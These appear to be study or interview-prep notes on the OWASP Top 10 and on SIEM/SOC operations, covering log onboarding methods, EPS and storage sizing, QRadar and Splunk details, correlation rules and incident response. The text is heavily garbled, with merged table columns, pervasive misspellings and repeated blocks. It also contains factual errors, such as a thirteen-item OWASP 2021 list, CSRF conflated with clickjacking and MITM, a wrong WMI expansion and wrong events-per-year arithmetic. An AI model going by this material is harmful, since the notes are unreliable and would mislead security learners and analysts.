CWE ( Coomon weakness exploitation or enumeration) atatck defined by OWASP TOP 10

OWASP TOP Intial conducted survey on 2010

2013
2017
2021
2025 ( Querter 1)

As per OWASP TOP 10 2021 atatcks are A01: Broken access control
A02: Cryptographic failures
A03: Injection ( Injection and Cross site scripting attack)
A04: Insecure design Design ( Threat modelling)
A05: Security misconfuigration
A06: vulnerable and outdated versions TPS
A07: Identification and Authetication failures
A08:Software and data integrity failures
A09: Insufficient logging and moniroing (SIEM)
A10: SSRF
A11: MITM
A12: Buffer overflow atatck
A13: CSRF or clik jacking or one click

1) Broken access control Attacker or internal employee can break the acces sprovided and it can be used for mis use pripose

Based on the inter employee roles and

responibilities and SoD ( Segregation of duties)
have to implement RBAC and from the external
atatacker point of view have to omplment Strong
Mitigation or complex password policies

this attack will occur when we are using weak ciphers on

top of there where we are hosting of the application (
Example CSR file download) and also SSL/TLS
2) Cryptographic failures certficates side ( Leagcy ciphers or ;legacy emcryption)

Use strong ciphers as per symmtric and asymtric

tenchologies and also based FIPS 140-2
Mitgation compliance

In the dresign level part of SDLC lifecycle lot compnaies

are not implementing Threat moedling using different
4) Insecure design types frameworks
 Implement Threat modeling by sitting softweare
architects or Product owners using Microsoft
Mitgation STRIDE analysis

This flaw or bug it will occur when the application WAF

team does not sufficient skills and also by doing type
5) Security misconfiguration errors or istakes or securitu misconfigrations

Reverify the confguration implementing security

controls for WAF, SAST, DAST or any other
Mitgtion tools
Providing the training to application security
team so that should not repeat mstakes once
again
Tgis issue will occur in the development phase part of
CI/CD pipe line. If we are using any leagcy or older or
outdated or EOL or EOS softeware for appllication
6) Vulnerable and oudated compnents devlopment, this issue will occur

Latest software or Tps version based on vendor

Mitigation provided
Educate implications or causes or impact if we
are using leagcy versions for application
devlopment to devlipers

Guessing the user name and password and scueeding

7)Identification and autication failures user credentials will fall under authication failure

Motgation 1) String password complex password

2) MFA
3) Default password should not use
If we ar enot providing RBAC or SoD in for the intenral
employess part of application development these will
8)Software and dat integrity failures occur

Mitgation Implement RBAC for repostiries

Iplement segreation of duties
All the application are not integrated to SIEM and also not
moroting 24*7*365 security incident investigation as
9) Insufficient logging and monitoring OWASP TOP 10 category of the attacks

Implementation logging and integrate to SIEM

Mitigation tool and monitor OWASP TOP 10 atatcks

A3) Injection flaw atatck ( Injection and Cross site scripting attack)

Attacker or end user will insert untrsuted or commands

where ever input validation is required and he will try to
execute those commands to verify whether application is
vulnerable or not and finally atatcker will compromise and
Injection flaw attack gain aunthroised access to backend server

What to inject 1) SQL queries

2) PHP
3)HTML
4) Javascript
5)LDAP
6) OS

Wgere to inject Where ever input validation required

For example
Username
Password
Like
share
comment Backed server side atatck
feedback

Why to inject To see whether the application is vulnerable or not

Mitigation 1) Input validation ( SAST scans , DAST, Manual penetest )

2) WAF

Atatcker or end user will insert untrusted SQL queries

where input validation is provided and he wil whether the
application is vulnerable or not. In web application is
vulnerable , he witl try to exute those SQL queries and
SQL ibjection atatck insuch way atatcker will comrpomise backend server

SIEM console
or user console
SQL injection atatck monitoring via SIEM tool Data sources or Log surces Log integration method Log collector Log processor or ESM
Alert will be
triggered as per SOC will take
OWASP TOP care of incident
1) DB server Syslog or Collector agent Aggregation Indexing 10 investigations
2) Webserver Syslog or collector agent Parsing quering
3) WAF Ssylog (Onpremise) , API token method (SaaS) Normalization Filtering
CRE (
Correlation rule
4)Application API token or syslog engine)

B) Cross site scriptin atatck CSS or XSS

Attacker will inject malcious data scripts into the web
application and . These data scripts atatcker and will see
whether it is excutable . Incase it is excutable atatcker will CROSS site scripting it is for both client and
gain auntorised acces server aide

Types cross site scripting atatck 1)Stored cross site scripting Server
2)Reflected clinet Alert ( " Refltected XSS")
3)DOM ( Dom object mode) Client Existing cookies

Mitigation 1) Input validation

2) WAS ( CSS or XSS)
3) Paramterized queries
Indetify the domains and busines ips and do
4) CSP ( Content securty policy) whtelist or block list where it is possible

10) CSRF ( Cross site request forgery or XSRF ) or Client side request forgery or
one click or click jacking
For already existing conenction between end and
application , atatcker will come as middle man and he will
url redirection or url manipulation or taking to deface or
fake website, and finally atatcker will gain unathorised
access or senstive data exposure

Two differe types of atatcks of cross site request forgery 1) Cleint side (CSRF)
2)SERVER side (SSRF)

Mitigations 1) Input validation

2)Paramatrised queries
3) WAF
4) SIEM tool ( CSRF and SSRF atatcks)
5) By implmenting Anti JWT token Honeypot -Network

When the input recieveing more number bytes int he

wqeb aplication whatver developer defined. Then it will
occupy more space or more staogra and finally system
Buffer over flow atatck woll become unaavulable od damged or crashed
 Dveelopers has to define buffer at the time
devloping of the input validation provided user
Mitgation with in the limits
2) Educate awreness training to all the devlopers
Attacker will come as a middle man in between end user
and also application or backend server , then atatcker will
TTP's related application side ( Taking to deface or fake
website, URL manipulation, spoofing, URL redirection,
stealing token etc) and finally atatcker will gain unathirised
MITM ( Man in the middle attack) access and sentive data exposure

Example : Session hijacking

CSRF
SSRF
CSS ( Stored, Refltec and DOM)
VPN authication failures
Spoofing category of the atatcks

Mithgations 1) Input validation

2) CSP
3) Paramterized queries
4) Storng Password polices
5) Anti CSRF toekn
5) SSL / TLS certficates using digital signaures
 Cyber Security
Safe gaurding or protecting end points, assets, databses, network, servers, application, cloud, infrastuctre etc from the attacker
Defintion 24*7*365 is called as cyber security

SIEM SIEM = SIM + SEM

2005 as per gartner report Amrith Williams
Stefan USA

Def SIEM Log collection

Log processing
Log mintoring ( Real time monitoring)
Log analsysis
Incidet montiroing and Securty incidnt alerting and Security incident
investigation tool

It is dedticated room or site where our cyber security analysts or

information security analsysts sit together they will initor 24*7*365
days , whenever secuertuy incident is triggered SOC team ( L1,
SOC ( Security Operation L2&L3) will take care of security incident investigations and also
center) forensic analysis

SOC alternative names CERT- Computer emrgncy response team Public and Govt sector
CSIRT- Cyber Security incident response team
SIRT- Security incident res;onse team
CDC- Cyber defence center
MSS team - Managed security services End point, Network, Cloud, Cyber , Applicationa nd Product
Blue team (Defensive)

Cyber security analsyt, Information security security analyst,

Levels under the SOC L1 or Level 1 or Tier 1 Security analyst 0-4 years False positve or Ture psotive
IR ( incident responder), Senior cyber securty analyst, Senuior
L2 or Lvel 2 or Tier 2 information security anlyst, Senior securty anlyst, Threat detector 4-7
Threat hunters , SME, team leads, POC, SPOC, Revrse
L3 or Levl 3 or Tier 3 engineers, Malware analysis 6+ years
L4 or SOC manager People management of L1,L2,L3 and also Technical maagement

Any compurer recorded activity or action is doing by each and every

Log employee and also asset etc

Log types of end user

machines ( Windows ) Security or Audit related logs Authication failure and also autication success
Application
System Performance
Set up or Config

Event Abnormal change of the log is called as Event

Alert Notification of an incident is called as alert

1) Email
2) Mobile
3) SNMP traps
4) Refrence set
5) Security tool dashboard
6)Syslog

It will negatively impact CIA traof the organization so that it will cause
confidentility ot privcy issues , Integrity related issues or Business
Incident outage or business disyptions .

Per scecond how many events or logs are genrting by data source or
EPS ( Events per second) Log source

EPM ( Events per minute) Per minute how many logs are generating

EPY ( Events per year) Per yer how many events are generating

FPS ( flow per sec) Flow = In the form of IP packer or trffic

Per sec how much flow data generating in the form of Ip packets
FPM ( Flow per minute) Per minute how much flow data is genrating

FPY ( Flow per year) For year How much flow daya is genarting

SIEM tool license Total number of end users in the orginization

Per day GB how much is genrating ( GB/DAY)

From where the logs or data is genrating is called as data source or

Data source or Log source Log siurce

Example of the data sources / Log sources

EDR, XDR, DLP, End point encryption, HIDS/HIPS, FIM , MDM,

NGFW, NIDS/NIPS, Proxy or web gateway, SAST scans, DAST,
1) Security data sources or log sources WAF, VM tools , Email GW/Email Securty , CSPM
2) Network data sources or Log sources Hub, Switch, Router, LB, WLAN, LAN , DNS , DHCP, DDI
3) infrastiurcture data sources or log sources All the servrs, all the end points, all the data base
4) Application All the application ( Onpremise/Cloud)
5) Cloud AWS, Azure, GCP, OCI , Ali baba , IBM etc

Total EPS /FPS caluclation

Data
sourcename /
Log source
name Quantiy eps count one data source Total number of EPS count( b*c) Flow per son one data source Total Number of FPS
Firewall 20 100 2000 50 1000
AD 10 50 500 50 500
EDR 1 500 500 500 500
Router
Switch
LB
WAF
SErvers
DB
end points
Email GW
DB servers
web servers
file servers
Application
DLP
Cloud
encryption
Proxy
NIDS/NIPS
SAST
DAST/\
VM
Total EPS count 10000-2024
Overall EPS count = 10000+ 10000*30%
10000+3000= 13000 13000 2024
13000+ 13000*30% 16900 2025
16900+ 16900*30 22100 2026

Calculation GB/DAY Total number of EPS count = 13000

Eper day Total number of events per second * 24*60^60

13000*24*60*60
1123200000

Evets per year Evebts per socnd *365

409968000000

Bytes per year 1event = 500b or 400b

Before
compression
ratio Eventes bytes per yeat events per year * byters per year
204984000000000
Compression rstive we will
conder as 1: 10, 1:15 or 1:17
After
compression
ratio ( Tital
numbers of
bytes) events bytes per year * 1/10
20498400000000
20498.4gb/day
20.4984 Tb/day
0.024984 Pb/day

IBM Q radar SIEM 1000 EPS 90days 6.5TB

Collecting of the logs from different type sof data sources and log
Agreggation sources from diffferent geopgraphical location

Example : Different types of dat sources or logsources

Different location ( Its applicable to distibuted deployemnt)

To cpnvert rw log foprmat into SIEM undersrtandle or reaable format

Parsing is called as Parsing

Example
Json
Syslog
HTML
XML
BSD CEF ( coomon event format ) All other SIEM tool vendores
Javascripti except IBM Q radar ( LEEF)

Interview question? Do you know or did you develope any time prasers ?
No, I did nto debvelope any time parsing issues but I used cordinate
with the SEIM tool vednor to rwsaolve the prasing relating issues by
providing raw log

Filtering Filtering is based on the several paramters like

1) Time stanmp
2) Log source / Data source
3)payload
4)Ip address
5)Hostname
6)Atatcker ip address
7) Action of the data soruce

Asking the question and to get the response from the fool pool of the
Querying logs is called as querying

IBM q radar AQL, PGSQL User feiendly

Splunk SPL Have to right queries
Azure sentinel KQL Have to requeies
Mcafee SQL User no friendly
HP arcsight SQL User friendly
dnif DQL Have to right queries
Exabeam SQL Have to right queries
RSA SQL User friendly
LR SQL User freindly
Normalization Converting of bigger raw log into smaller raw log
Rescaling of the law

Indexing Groupon gof simplar types of log sources or data sources

By default every SIEM tool will under will use default index as * All the logs or pool of the logs

Coorelation Linking one event with another event ( Normal vs abnormal event )

Linking one event with another event based ont eh condition or logic
Correlation rule or Policy or policy or boolean algebra fucntions Alert or allow

Coorelation rule or use case or atatcks

Note : for each end very attack we will create coorelation rule or
boolean algebra or condition or logic

Example
Multiple authication log in faolure attempts are coming dame source
name
Multiple authication log in failures are coming from same source ip
From the disbled account log in failures are coming
From the terminated account log in are failure are coming

Reentention policy How many days we are stroing the logs

1) Compliance
2) Business we are doing
3) Tracking of the incidents

For example For ISO 27001 1 year online

PCI DSS 6months online and 6 months offline

Online logs= Inbuilt storage SIEM tool is provoding

Offline storage = Dumping into thrid party Cloud drives
SAN
NAS
Magantic tapes
External hard disk

Log into data source or log source

Log integration or Log and sending the logs from data
onboarding or loag abord or source or log source is called as
log collection methods Logging mechinsm types are 1)Push method Push Mechanism
Log into SIEM tool and feting the
logs from data sources or log
2)Pull mechniasm sources id allaed as Pull mechanism
3) Comibination and PUsh and Pull mechanism is called as
Hybrid
Log integration ethods are 1) Syslog server method
2)API token method
3) Coolector agent
4)Flow collector IBM Q radar, HP arcsight Aand Mcafee
4)Cloud connector
6)WMI
7)MSRPC
8) Appsmethod

This method is applicable to All the network devices ( FW, proxy,

1) Syslog server method ( PUSH mechism) Router, Switch, LB, All the server, etc)

1) Log in into dats rouce or Log source ( Network or server logs) Palo alto/Fortigate
2) Click on the servers tab Router IB qradar
3) Click on the syslog server option PGSQL Splunk
4) Do the below confiuration
SIEM tool name SIEM host name SIEM tool ip address Port number Protocol Log format
IBM Q radar TCSHYDSIEM.COM 10.10.10.1 514 TCP Syslog

5) save the config and also do test connectivity

After configuring the syslog server option for verofication i WILL

LOG INTO SIEM tool and verify whether the logs are eflecting in
SIEM tool or not

Option1) Log are coming or We are fine and we are well

There are two options reflecting in the SIEM tool and good
Option 2) Logs are not reflecting or
coming in the SIEM tool
1) Verify the sys log
configuration in the log source
or data source
2) Take the packet capture
file (PCAP)

It will provide network traffic

analysis in between source
source and destintion using
PCAP ( pacap) or TCP dump
analysis using TCP/IP
reference model;
 Client side errors or server
side erros and also all the
HTTP request and HTTP
responses are happening
properly using Open id
connect with Oauth 2.0 and
JWT toekn based
mechanism and addionally
In the application have to even we have to verify DNS
verify on between source records are configured are
Preparation, identification, Traiage, evidence and reporitng denstination properly not
All the TCP flags are
confiuired properly , and also
In tne Tranport layer sude in TCP 5 handshake is
betwene source and completed successfully or
destination we have to veirfy not
In the Network or internet
layer in between source and
destination have to veirfy Packet routing
Pack is retransimted
Packet is blocked
Packet is allowed
Is there any physical
connecvity issues using
cables ? and also also is
there VLAN confiuration
relateds and also frames is
In the network interface or causing any half duplex and
network ethernet side full duplex issues

This method is applicanle to integrate either all the point logs to

2)Collector agent SIEM tool or Any server logs to SIEM tool
Vendor provied software has to install on the end user machien
and has to confugre below configuration

Soure ip Destintion ip Port number Porotocol

Data spurce or log source ip SIEM tool ip 443 TCP
8443 TCP
9093 TCP

There after have to save tthe configuration

Logs are reflecting in the siem
Option 1) TOOL
Logs are not reflecting into SIEM
Option 2 tool

Incase logs ore anot reflecting do the below action 1) Wake up the log collector gent
2) Uninstall and reinstall the agent
once againt
3) Take the tcp dump file and alayse
the logs or packet capture cmd>tcpdmp -d
4) Impore the the file in wire shark
adna anaylse TCP/IP layer analssys
5) Raise a case with the vendor to
ifx the problem

Thos method is applicable to SIEM tools like IBM q radar, HP

3) Flow collector method (Push mechnism) Archsight and Mcafee

All the critical or noncrtical flow data integrate to SNMP traps or

dorectly can configure one of the switch or router interface as
SPN/Mirror /tap metod and from there coonect to SIEM tool

Option1) Flow are coming or We are fine and we are well

There are two options reflecting in the SIEM tool and good
Option 2) Flow are not reflecting or
coming in the SIEM tool
1) Verify the sys log
configuration in the log source
or data source
2) Take the packet capture
file (PCAP)

It will provide network traffic

analysis in between source
source and destintion using
PCAP ( pacap) or TCP dump
analysis using TCP/IP
reference model;
Client side errors or server
side erros and also all the
HTTP request and HTTP
responses are happening
properly using Open id
connect with Oauth 2.0 and
JWT toekn based
mechanism and addionally
In the application have to even we have to verify DNS
verify on between source records are configured are
denstination properly not
All the TCP flags are
confiuired properly , and also
In tne Tranport layer sude in TCP 5 handshake is
betwene source and completed successfully or
destination we have to veirfy not
In the Network or internet
layer in between source and
destination have to veirfy Packet routing
Pack is retransimted
Packet is blocked
Packet is allowed
Is there any physical
connecvity issues using
cables ? and also also is
there VLAN confiuration
relateds and also frames is
In the network interface or causing any half duplex and
network ethernet side full duplex issues

4) API token method (Pull mechanism)

1) Log into the tool
2) Please go to API token method
3) Generate API toek URL, Access and secret key
4) Take the API token URL, keys onformation
1) Log into SIEM tool
2)Select log dource as as Saas
based tool (EDR)
3) Providre access key, secrrey key
and URL whatver we tok from the
Saas based tool
4)Save the configuration

Option1) Flow are coming or We are fine and we are well

There are two options reflecting in the SIEM tool and good
Option 2) Flow are not
reflecting or coming in the
SIEM tool
1) Verify the sys log
configuration in the log
source or data source
2) Take the packet capture
file (PCAP)

It will provide network traffic

analysis in between source
source and destintion using
PCAP ( pacap) or TCP dump
analysis using TCP/IP
reference model;
Client side errors or server
side erros and also all the
HTTP request and HTTP
responses are happening
properly using Open id
connect with Oauth 2.0
and JWT toekn based
mechanism and addionally
In the application have to even we have to verify
verify on between source DNS records are
denstination configured are properly not
All the TCP flags are
confiuired properly , and
In tne Tranport layer sude in also TCP 5 handshake is
betwene source and completed successfully or
destination we have to veirfy not
In the Network or internet
layer in between source and
destination have to veirfy Packet routing
Pack is retransimted
Packet is blocked
Packet is allowed
Is there any physical
connecvity issues using
cables ? and also also is
there VLAN confiuration
relateds and also frames is
In the network interface or causing any half duplex
network ethernet side and full duplex issues
5) APPs emthod This method is applicable to only solunk
Splunk is supporting three deiffterent types of log integration
methds
 1) Collection agent ( Using forwarwarer)
2)Syslog server
3) Apps method

Apps method can used to integrate unknown log dource or data

surce logs integration SIEM tool other than Syslog server option
and collectior agent method

Option1) Flow are coming or We are fine and we are well

There are two options reflecting in the SIEM tool and good
Option 2) Flow are not reflecting or
coming in the SIEM tool
1) Verify the sys log
configuration in the log source
or data source
2) Take the packet capture
file (PCAP)

It will provide network traffic

analysis in between source
source and destintion using
PCAP ( pacap) or TCP dump
analysis using TCP/IP
reference model;
Client side errors or server
side erros and also all the
HTTP request and HTTP
responses are happening
properly using Open id
connect with Oauth 2.0 and
JWT toekn based
mechanism and addionally
In the application have to even we have to verify DNS
verify on between source records are configured are
denstination properly not
All the TCP flags are
confiuired properly , and also
In tne Tranport layer sude in TCP 5 handshake is
betwene source and completed successfully or
destination we have to veirfy not
In the Network or internet
layer in between source and
destination have to veirfy Packet routing
Pack is retransimted
Packet is blocked
Packet is allowed
Is there any physical
connecvity issues using
cables ? and also also is
there VLAN confiuration
relateds and also frames is
In the network interface or causing any half duplex and
network ethernet side full duplex issues
6) Cloud conenctor method (Push and Pull - Hybrid mechanism)
This method is applicable integrating cloud service provider logs
to SIEM tool
Ex
AWS
Azure
GCP
Ali baba
OCI
IBM
Cloud flar

Skyformation, IBM Alibaba,

Example How to integrate AWS logs to SIEM tool Oracle Fortigate

AWS Haddop/data scine Pull mechanism Cloud connector Push Exabeam

1) Lon into account 1) Lohg into cloud connector

2) Note AWS region name 2)Select log source AWS
3) Provide the region,
3) Then configure cloud trail (Security audit) accesss key and secret key
4) Configure the cloud watch ( System, Setup, Application, 4) Save the config
5)5) Have to genrate access key and secret key
6) DSave the confguration 1) Go tpo settings tab
2) Click on the syslog server
3) Do the below config
SIM TOOL name Ip address Port number Protocol Log fprmat
Exabeam 10.10.10.1 514 tcp bsd
4) Do the test connecvity
5) Save the configuration

Option1) Flow are coming or We are fine and we are well

There are two options reflecting in the SIEM tool and good
Option 2) Flow are not
reflecting or coming in the
SIEM tool
1) Verify the sys log
configuration in the log
source or data source
2) Take the packet capture
file (PCAP)

It will provide network traffic

analysis in between source
source and destintion using
PCAP ( pacap) or TCP dump
analysis using TCP/IP
reference model;
Client side errors or server
side erros and also all the
HTTP request and HTTP
responses are happening
properly using Open id
connect with Oauth 2.0
and JWT toekn based
mechanism and addionally
In the application have to even we have to verify
verify on between source DNS records are
denstination configured are properly not
All the TCP flags are
confiuired properly , and
In tne Tranport layer sude in also TCP 5 handshake is
betwene source and completed successfully or
destination we have to veirfy not
In the Network or internet
layer in between source and
destination have to veirfy Packet routing
Pack is retransimted
Packet is blocked
Packet is allowed
Is there any physical
connecvity issues using
cables ? and also also is
there VLAN confiuration
relateds and also frames is
In the network interface or causing any half duplex
network ethernet side and full duplex issues

3) After doing the analysis still

you are facing any issues
raise a case with the vendor
to fix log issue

7) WMI ( Windows meessaging insturmentation)

To integrate windows logs to SIEM
tool we will WMI method
Draw with this method incaselogs
are generating ore than 50EPS this
method will not usefull

This method is applable to intretaed

all windows logs to SIEM tool. This
method will support more than
8) MSRPC ( Microsoft remote procedure call) 50EPS sec also

Supported vendors
1) IBM Q radar
2)HP Arcsight
3)Logrhythm
4) Mcafee

It is step by step process or phase by phase taking care incident

Incident investigation investgation or forensic analysis
Whenver any security incident triggered based on ITIL or NIST
Incident response framew we will take care of end to end incident investgation
Forensic analysis Doing in depth analysis for the security incident investgation
Forensic types are
Take HW and conenct Our forensic
1) Analog Forensics (Physical ) tool to POhsical HW device Malware
2)Digital forensics Snapshot or Image E0 YARA
E1 Thumbnails
 E2 DLP
E3 Finger prints

Example tools are Encase

Oxygen
Acess Data ( FTK)
Cellibrite
Threat ointelligince feeds are regular updates from differentypes
of news chanellers or vendors and will get what are all the
vulnserabilies, thearts and issues are going across the world
TIF ( Threat intelligence feeds ) wide. We Will get these TIF's in the form feeds

Example threat intelligence feeds are

1) OSINT ( Open source intelligence)
2) Check point ( CSP, and Firewall)
3) Crowdstike ( EDR,XDR, CSPM)
4) IBM xforce, Mcagee GTI, Splunk GTI, LT, GTI, etc
5) Mandiant
6) SDK
7) Palo alto XSOAR, End point Cortex

Note: Whenver we are recieveing the TIF from the different

vedors or open source tools like IP address, Doamin name, URL
links, Hash values and whereever it possible after doing the BIA
and Risk assemtn try to block those malcious content ip
addresss, domain name, hash values and URL links proactively
in our tools

Note 2: Threat intelligence feeds analysis related BIA and Risk

aseesment indirectly depending proactive threat hunting

Correlation rule Default

Customized

Every SIEM tool to configure the correlation it will use one of the
CRE enginie engine is called as CRE engine

Note: Processing or the correlation rule it is happening in the Log

manager or lOg processor or data processor or Node
Note 2: All SIEM tool vendors Correlation ruel engine called as
CRE engine except Logrhythm . Logrhythm side CRE engine is
called as AIE engine( Adavanced intelligence engine)

Huting of threats or attacks or vulnerabilities in the proactive is

Threat hutning called as Threat hutning

Threat hurnting types are Automated

Manual

It is based on correlation ruel

creation or policy creation using
condition or algorithm or logic using
A) Automated Threat humting algebra functions
B) Manual Threat hunting Hypo Thesis
Assumiptions
Query based
Trail and error

1) I week Multiple authication log in failures from the Internal or Splunk, Exabeam, Elk ,
External ip Event ID = "4625 " 100 Sentinel, Securonix Windows
Multiple authication log in IBM Q radar, LR, RSA, Forti
Filtering failures and 1 week SIEM, Alien Valut

100 90

2) Impossible travelrsal atatck for VPN 1 Day 20

Manual 19

C) Some other paramters threat hunting is depnding on Vulnerability management

Risk Managemnt and Risk
Assesment
Theat intelligence feeds integration
UEBA ML+AI Unknown categroy
SOAR

User behaviourial analaytics (ML +AI + Mathematical + Dta

UEBA (UBA) = (UBA + EBA) nalytics + Statistics) Malware IR 4 Hours
Entity behvorial analytics (End point, DB, servers, Network
devices etc )

UEBA is cappliacble to New categorty of the atatcks are doing

by the atatckers
User Exabeam
It will check with past or
Ramesh Facebook.com hsitorical analysis
False psotive or True
Alert psotive
Ramesh Facebook.com

Ramesh

Akira 1.10
Lockbit 4.0

SOAR ( Security Orchestration and automated resposne) Orcehstation = Planning

AIR= Automated incident response

Log Source or data source Log integration method (SIEM ( LC, LP and ESM) SOAR
1) AV/EDR/XDR---Carbon Black Sylog/API 1)
2) NGFW - Palo alto Sylog
Malware
3) Malware analyis Syslog Malware atatckr Correlation
4) Phsiing emailVia Malware atatchment Syslog/API rule
Syslog - 514 Attacker IP 1.1.1.1 NGFW
abcd0101defghi
EDR, FW, proxy, DNS Hashvalue j EDR

EDR= Hash value

NGFW- IP
Log Source or data source Log integration method SOAR Palo alto XSOAR
1) AV/EDR/XDR---Carbon Black Sylog/API Crodstrike SOAR
2) NGFW - Palo alto Sylog
3) Malware analyis Syslog
4) Phsiing emailVia Malware atatchment Syslog/API

SIEM SOAR
IBM Q radar SIEM IBM Reslient
Exabeam Incident responder
LR LR SOAR
Seninel Sebtinel SOAR
Splunk Phantom
Palo Alto XSOAR

SIEM tool s As per Gartner 2024 report

Leader Splunk
Azure sentinel
IBM Q radar
Securonix
Exabeam

Challenger Sumologic
Rapid7
Fortigate SIEM

Niche Players Hauweir

Logpoint
Mnaage Engine
QAX
Virustech

Visionary ELK
Open text
 Google chronicle

Microfous or HP Arcsight
Mcafee SIEM
AWS gaurd Duty
Logrhythm

GENRIC SIEM ARCHITECTURE Diagram

Licensing
1) GB/DAY
2)total Number of end users

Deployment
Hardware
Software
All in one box

Impelemntation
1)Stand alone Single
2)Distibuted Multiple locations
3)High Availibility

Feature prospective
1) Threat intelligence feeds
2) UEBA
3)SOAR
4) Threat hunting
5) Premium support
6) Integrating with or Deiscovery of the assets
7) Risk maanager
8)Vulnerability scanning
9) Flow integration and event integration

Additional licensing
1) SOAR
2)Storage or Node
3)Threay Hutning
4)UEBA ( Advanced analytics)
5) Flow integratioj have to purchase addtional mudles like Flow
collector
6)Premium support

Archhitectire diagram or Components

Incident investitgations, SOC team or L1,L2 and L3
Administarion of the SIEM , dash operations will use this
baord creation, Report generation, console to take care of
1) ESM (Enter prise security manager ) or SIEM console or User Thret hunting, UEBA, Log activity, security incident
console OR GUI Network activity investigations
2) Log Manager or Log Processor Data processor It will do processing of the logs
Indesxing
Querying
Filtering
CRE
3) Log collector Collection fo the logs ( Aggregation)
Normalization
Parsing

SIEM tool backend process how the asecurity incident or alert

will be trioggered
Lc/dc it will collect the logs from different types of log sources
like all servers, all databases, all applications, Firewall, proxy,
nids/nips, edr, dlp, eNCRUPTION, FIM , HIDS/HIPS, router,
switches, LB, LAN , WAN , VM , WAF and all the clous using
different types of log integrations methods. After LC it will
complete aggregation parsing and normallization
LC/DC it will logs to LP/LM . There after LP/LM/DP it will
complete processing of the logs and also addtionally it will
complete backend proces slike indexing, querying, fiultering and
also it contains backend CRE ( Corrleation rule engine)
Wheneber any abnormal or supicioyus or illigitmate or
unathorised activity can be done either internal employess or
extrernal atatcker based on the rules or ;polices or conditons or
slgortims or use ceases created under LM/LP it will hit the logic
and finally front end os the SIEM tool or user console alert will be
trgieered or notified
Aa SOC team of L1. L2 and LE team amebers we are taking
care of security incident investigations and forensic analysis

Designing Stabnd alone

Akll the three compnents should be
deployed in the same location

Disributed
Hyd HQ
BNG branch Office 1
Chn Branch office 2
MBM Branch Office 3

Two parameters can be choosen if

we want to calculte proce or cost
1) Send the logs from remote branch
office to HQ How much cost is involved ?
2) Try to evaluate how much HW is
cost or software is required if the
collection and processing can be
done under the Branch office itself How much cost is involved ?

Managemtn ip or
management host name or
1) Assign the ip aaddress or SIEM console or user console
Generic SIEM tool implemntation hostname or GUI
2) Subnet mask
3)Default gateway
4) Primary DNS
5) Secondary DNS integration
6) Ingrating with AD
7) Define the RBAC L1,L2 and L3
8) User management RBAC
User groups
9) Single tenanat /Multi tenant
10) Log onboarding / Data source
onaboarding
11) Coreelation rule creation
12)Fine tuning
13) Stablisizing the soc operations
minimum 6 weeks to 15 weeks
14) SOP or Runbook or playbook
15) Dash abord creation
16)Health check up
17) Report generations
18)SMTP server
18) AD (Context tables) UEBA
19) proxy

It is a step by step process

documentation for true posive
sscnrarios whenever any atatcker
comrpomised any system. It will
provide Where, when, how , why ,
what icnidne tis got comrpomised
and what are all the approptiate
actions ghave taken care as per
incident licecly management using
RCA( Root cause analysis) IR process

It is step by step or phase by phase

approach whenver any security
incident is triggred what L1 team has
to do, what L;2 team has to do and
what L3 team has do pasrt of
PlayBook or Runbook or SOP securitu incident investgations

The average time how much time it

MTTD(Mean time to dection) will take to detect incident

the average to how much time it will

MTTI take to identify incident categroy
 MTTR (Mean time to recovery) The average to recover the data
The average it will take to respond
MTTR (Mean time to response) the incidents alreats as IR process

Explain about day in and day out taks what you will do? Shift take over
Working on security incidents
Shift handover
Healthc chekc up

The team who is working on current

shoft will provide takss informationor
incdioent inforation to forthcoming
shift ( How many incidents are
closed, wip, onhold, recolved) is
Shift handover called shift handover via call

The forthcoming team will take the

incident i nformation from the
existing team or previous team of
the icnidents information is called as
Shift take over shift takover

It is a contructual agreement
between customer and
consulting/service based company
how much time it will take to
complete security incident
investgations based on the severity
SLA level . SLA are based time based

2) IBM Q radar
Q radar architecture digram
Event collector it cpllect the logs
from different types of logs sources
od data sources
Flow collector it will colelct the flow
data from did ferent types of data
sources ) Netflow, S flow , J flow etc
)
1)Aggregation
2)Parsing
1) Event collector or Flow collector 3)Normalization Hardware based 1200, 1300 or 1400
Evet processor it will colelct the logs
from event collector and then it will
do processing of the logs
Flow collector it will collect flow data
from different types data sources
and it will do processing of the flow
data
1)Indexing
2)Querying
3) Filtering
2) Event Processor and Flow processor or Data processor 4)CRE Hardware based 1700,1800 and 1900
It will take care of Q radar SIEM
administaration, Impelemntation,
condsifguration, log onaraidng,
Finetuing, correlation rule creation,
Soc operations, Threat hunting,
SOAR, UEBA and also crseating of
dashbaords and also report
3) Q radar console or User console or SIEM console or GUI generation
Stroing of the logs and for forensic
4) Node analysis and also auduting

Backend process

Q radar licensing GB/DAY

Q radar storage claculation 1000 EPS for 90 days 6.5 tb

Example Appolo required for 1 year

how much storage required for 5000
EPS
5*6.5.tb*4 130TB

SIEM tool hardware model

Deployment Hardware Based 3,425,347,542,754,250 numbers
Software
All in one box EC. FC, EP, FP and ESM

Impelemntation Standalone Single location

Distributed Multiplelocations
Cloud ( Q RoC)- Q radar on Cloud

Note: Q roc is part of Plao alto

XSOAR and IBM is sold QRoC palo
alto

IBM q radar features 1) Asset discovery

2) Vuulnerabiltiy scanning
3) Netflow
4) Risk manager
5) UEBA
6) Threat Hunting
7)SOAR- IBM resilient
8) Premium support
9)Additional storage

Log integration methods Sylos ( Push) 514 and 6514

Cillecorr agent (Push) 443,8443, 9093
Flow colelctor ( SPAN/Mirro/Tap)
API (Pull)
MSRPC ( Push)
WMI (PUSH)

Admin console port nuber 8443

Colleascing in IBM q radar Removiing of the duolicates

Offense security incident in the IBM

Offense q radar side

We can define maganitude

score under correlation ruel
It is a avareage of releavance, creation or Policy creation
Magntide ( Risk score) severity and credibility usecreation

Magaitude score will be in the range

of 0 to 10 scale

Whaling of category of the

Examaple take atatck

Releavance 9
Severity 10
Credebility 9

Magnitude = 10+9+9/3===9.33
9
Magntiude = 9 Critical or severity

Karthik Ravikanth Nagarjuna Siva

1) Server got compromised by
Ransomware 2 1 1 2
2) Ebnd user system is got
compromise dby Virus 3 3 2 1
3) One of the CEO recived Mlacious
URL link as a POhishing email 1 2 3 3

Backend Q radar databses AQL ( IBM )-

PGSQL (Postgress Sql query
language)

CEF (Common event format) LEEF ( legiht exteded event format)

It can be used to intrgeate third laty

log sources or data sources
DSM ( Device support module) integration Other than IBM products
ex: Palo alto firewall
 Dat processing No processing Basic Full parsing
Resource usage Minimal Moderate High
Complex processing before
light processing before forwarding to Search
Use case High violument data colection forwarding to Searcj indexers indexers

Splunk buckets are There are two reasons we can use spluk buckets
1) Retention policy
2) Auditing

There are 4 types of buclets under splunk

1) Hot
2)Wrm
3)Cold
4) Forzen
Bucket type Description Dat age Storage Searchbale
